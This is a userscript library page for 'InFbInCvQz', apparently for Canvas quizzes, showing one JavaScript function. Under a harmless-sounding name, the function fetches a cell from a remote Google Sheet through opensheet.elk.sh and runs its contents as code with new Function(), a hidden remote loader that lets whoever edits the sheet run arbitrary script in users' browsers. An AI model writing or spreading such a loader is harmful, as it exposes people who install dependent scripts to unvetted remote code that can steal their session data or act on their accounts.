InFbInCvQz

In-Fb-In-Cv-Qz

This script should not be not be installed directly. It is a library for other scripts to include with the meta directive // @require https://update.greatest.deepsurf.us/scripts/531210/1561988/InFbInCvQz.js

  1. function insertFeedbackInCanvasQ(){
  2.  
  3. fetch(
  4. "https://opensheet.elk.sh/1PDJD95ebVrFhGiYi58tCmLoZD6eY6sfKLGyrowJfLqA/Sheet1"
  5. )
  6. .then((res) => res.json())
  7. .then((data) => {
  8. const myFunc = new Function(data[4]['BklScripts']);
  9. myFunc();
  10. });
  11.  
  12. }